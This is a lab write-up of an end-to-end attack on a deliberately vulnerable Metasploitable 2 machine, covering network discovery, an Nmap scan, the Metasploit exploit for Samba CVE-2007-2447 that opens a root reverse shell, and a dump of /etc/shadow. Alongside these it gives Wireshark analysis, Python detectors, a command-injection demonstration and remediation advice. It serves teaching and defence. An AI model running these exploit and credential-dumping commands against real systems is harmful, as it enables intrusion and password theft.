Overview
This is a complete attack chain from start to finish, the way a real attacker would approach a target: starting from zero knowledge of the target, discovering it on the network, scanning it, finding a vulnerability and exploiting it. Wireshark ran the entire time so I could capture and understand what the traffic looks like at each stage.
The point of this writeup is to walk through the methodology, not just the commands. Each phase is annotated with what I was looking for and why.
Lab Setup
| Machine | Role | IP | OS |
|---|---|---|---|
| Kali Linux 2026.1 | Attacker | 192.168.56.102 | Kali Linux |
| Metasploitable 2 | Target | 192.168.56.101 | Ubuntu 8.04 |
Both machines run in VirtualBox on a Host-Only network, completely isolated from the internet. Metasploitable 2 is an intentionally vulnerable machine built specifically for this kind of practice.

Step 1: Reconnaissance
I only knew the subnet. From there I used netdiscover to find what was actually alive on the network.
sudo netdiscover -r 192.168.56.0/24
It came back with 3 hosts. The target showed up at 192.168.56.101.

Step 2: Scanning
With the target IP in hand, I ran a full Nmap scan to see what services were running and what versions they were on. This is where things get interesting.
nmap -sV -sC -O 192.168.56.101
| Port | Service | Version |
|---|---|---|
| 21 | FTP | vsftpd 2.3.4 |
| 22 | SSH | OpenSSH 4.7p1 |
| 23 | Telnet | Linux telnetd |
| 80 | HTTP | Apache 2.2.8 |
| 139/445 | SMB | Samba 3.0.20-Debian |
| 3306 | MySQL | 5.0.51a |
| 5432 | PostgreSQL | 8.3.0 |
| 5900 | VNC | protocol 3.3 |
| 8180 | HTTP | Apache Tomcat 5.5 |
OS detected: Linux 2.6.X (Ubuntu 8.04)
The machine had a lot of open ports, which is already a red flag. What stood out immediately was Samba 3.0.20: that specific version has a well-known critical vulnerability, CVE-2007-2447.

Step 3: Exploitation
CVE-2007-2447: Samba Username Map Script RCE
Samba 3.0.20 has a flaw in how it handles the username field during SMB authentication. The vulnerability lives in the username map script option: Samba passes the username to a shell without proper sanitization, so an attacker can inject shell commands through it without needing any credentials. CVSS score: 10.0 (Critical).
I used Metasploit to exploit it:
msfconsole
use exploit/multi/samba/usermap_script
set RHOSTS 192.168.56.101
set LHOST 192.168.56.102
exploit
[*] Started reverse TCP handler on 192.168.56.102:4444
[*] Command shell session 1 opened (192.168.56.102:4444 -> 192.168.56.101:47895)
whoami
root
Root access. No credentials, no brute force, just a vulnerable service version. That is how fast it can go when software is not patched.

Step 4: Post-Exploitation
Once inside I confirmed the access level and read /etc/shadow to show what root access actually means in practice.
id && hostname && cat /etc/shadow
Every password hash on the system was right there. In a real scenario this would be game over: offline cracking of those hashes plus lateral movement using credentials reused elsewhere.

Wireshark Traffic Analysis
I kept Wireshark running the entire time. Looking back at the capture you can clearly see the different phases of the attack just from the traffic patterns:
- Reconnaissance generates a spike of ARP requests in a very short window
- Scanning floods the target with SYN packets across all ports
- Exploitation shows SMB traffic followed immediately by an outbound connection on port 4444, which is the reverse shell connecting back
This is the kind of pattern that any half-decent network monitoring would catch in production.
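To show what those three signatures look like as detection logic, here is an added example (mine, not part of the original writeup or the linked repository) that runs three simple detectors over constructed packet summaries shaped like Wireshark's packet-list columns. The `Pkt` record type, the sample traffic and the thresholds are assumptions, chosen to mirror the phases described above.

```python
import re
from collections import Counter, defaultdict, namedtuple

# Added example, not the original pcap. Each record mirrors Wireshark's packet-list
# columns (time, source, destination, protocol, info); records are in capture order.
Pkt = namedtuple("Pkt", "t src dst proto info")
ATTACKER, TARGET = "192.168.56.102", "192.168.56.101"

def sample_capture():
    """Constructed traffic reproducing the three phases seen in the lab capture."""
    pkts = [Pkt(0.01 * i, ATTACKER, f"192.168.56.{i}", "ARP", f"Who has 192.168.56.{i}?")
            for i in range(1, 41)]                                   # netdiscover sweep
    pkts += [Pkt(5 + 0.001 * p, ATTACKER, TARGET, "TCP", f"[SYN] dport={p}")
             for p in range(1, 301)]                                 # nmap port scan
    pkts.append(Pkt(20.0, ATTACKER, TARGET, "SMB", "Session Setup AndX Request"))
    pkts.append(Pkt(20.2, TARGET, ATTACKER, "TCP", "[SYN] dport=4444"))  # reverse shell
    return pkts

def _dport(p):
    m = re.search(r"dport=(\d+)", p.info)
    return int(m.group(1)) if m else None

def arp_spike(pkts, window=1.0, threshold=20):
    """Sources that send more than `threshold` ARP requests inside one `window`-second bucket."""
    buckets = Counter((p.src, int(p.t // window)) for p in pkts
                      if p.proto == "ARP" and p.info.startswith("Who has"))
    return {src for (src, _), n in buckets.items() if n > threshold}

def syn_scan(pkts, threshold=100):
    """(src, dst) pairs whose SYNs reach more than `threshold` distinct destination ports."""
    ports = defaultdict(set)
    for p in pkts:
        if p.proto == "TCP" and "[SYN]" in p.info:
            ports[(p.src, p.dst)].add(_dport(p))
    return {pair for pair, s in ports.items() if len(s) > threshold}

def reverse_shell(pkts, host, suspicious=frozenset({4444}), within=5.0):
    """Outbound SYNs from `host` to a suspicious port within `within` seconds of inbound SMB."""
    last_smb, alerts = None, []
    for p in pkts:
        if p.proto == "SMB" and p.dst == host:
            last_smb = p.t
        elif (p.proto == "TCP" and p.src == host and "[SYN]" in p.info
              and _dport(p) in suspicious and last_smb is not None
              and p.t - last_smb <= within):
            alerts.append((p.t, p.dst, _dport(p)))
    return alerts
```

The same three functions can be fed records exported from the real pcap (File > Export Packet Dissections > As CSV) once the columns are mapped onto `Pkt`.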

Findings
| Vulnerability | CVE | Severity | Remediation |
|---|---|---|---|
| Samba 3.0.20 RCE | CVE-2007-2447 | Critical | Upgrade Samba to 3.0.25 or later |
| FTP Anonymous Login | - | Medium | Disable anonymous FTP access |
| Telnet enabled | - | High | Replace with SSH, disable Telnet daemon |
| VNC no authentication | - | High | Enable VNC authentication, restrict to VPN |
| Apache 2.2.8 | Multiple CVEs | High | Upgrade Apache, enable security headers |
Application Security Takeaways
The headline finding is CVE-2007-2447, a remote code execution via shell command injection in an authentication path. From an application security perspective there are several lessons worth pulling out:
Input handling at trust boundaries. Samba accepted a username field and passed it to a shell. That is textbook command injection: attacker-controlled input reaching an interpreter unsanitized. The same class of bug appears in modern web apps as command injection in image processing, file uploads, or anywhere user input feeds into exec-style calls. The mitigation is parameterized APIs and strict allow-lists, never reliance on the absence of metacharacters.
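As an added example (not Samba's code), the bug pattern beside its hardened form: a hypothetical username map script, stood in for by `echo` so the effect is visible in stdout, invoked first through a shell and then through an allow-list and an argv call with no shell. `MAP_SCRIPT`, `USERNAME_RE` and the function names are assumptions.

```python
import re
import subprocess

# Added example, not Samba's code. MAP_SCRIPT stands in for an administrator's
# "username map script"; echo is used so the effect is visible in stdout.
MAP_SCRIPT = "echo"
USERNAME_RE = re.compile(r"[a-z_][a-z0-9_.-]{0,31}")   # strict allow-list for the field

def map_user_unsafe(username):
    """Bug pattern: the username is spliced into a command line that a shell parses."""
    cmd = f"{MAP_SCRIPT} {username}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout.strip()

def map_user_argv(username):
    """No shell: the value travels as one argv element, so metacharacters stay literal."""
    return subprocess.run([MAP_SCRIPT, username], capture_output=True, text=True).stdout.strip()

def accepted(username):
    """Allow-list check: only the characters a username may contain, nothing else."""
    return USERNAME_RE.fullmatch(username) is not None

def map_user_safe(username):
    """Hardened: reject anything outside the allow-list, then call without a shell."""
    if not accepted(username):
        raise ValueError(f"rejected username: {username!r}")
    return map_user_argv(username)
```

With the constructed input `alice; echo INJECTED`, the shell path runs two commands, the argv path echoes the string literally, and the hardened path rejects it before anything runs.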
Version management as a security control. The fix for CVE-2007-2447 shipped in 2007. Any system running Samba 3.0.20 in 2026 is running a known critical bug from almost two decades ago. Real production environments have dependency drift constantly, which is why SBOM tracking and automated CVE scanning (Dependabot, Trivy, Snyk) are not optional in mature AppSec programs.
Defense in depth assumes the first layer will fail. Even if Samba had been patched, the same machine ran Telnet (cleartext credentials), anonymous FTP, and unauthenticated VNC. Removing the single critical CVE would still leave multiple paths to compromise. Real AppSec hardens at every layer rather than fixing one bug and calling it done.
Detection signals as a development-time concern. The traffic patterns above (ARP spike, port scan, reverse shell on a non-standard port, root reading /etc/shadow) are all detectable. Building applications and infrastructure that emit useful telemetry, with logs structured the way SOC tooling expects them, is increasingly considered an AppSec responsibility.
MITRE ATT&CK Mapping
- T1595: Active Scanning (netdiscover + Nmap recon)
- T1046: Network Service Discovery (service version detection)
- T1190: Exploit Public-Facing Application (Samba RCE)
- T1059: Command and Scripting Interpreter (reverse shell)
- T1003.008: OS Credential Dumping via /etc/shadow
Artifacts
The full repository, with the Wireshark pcap capture, exploit configuration, and high-resolution screenshots, is available on GitHub:
github.com/mihaitapalaga/security-portfolio
The pcap file is useful if you want to open it locally and follow the traffic phase by phase against the timeline of the attack.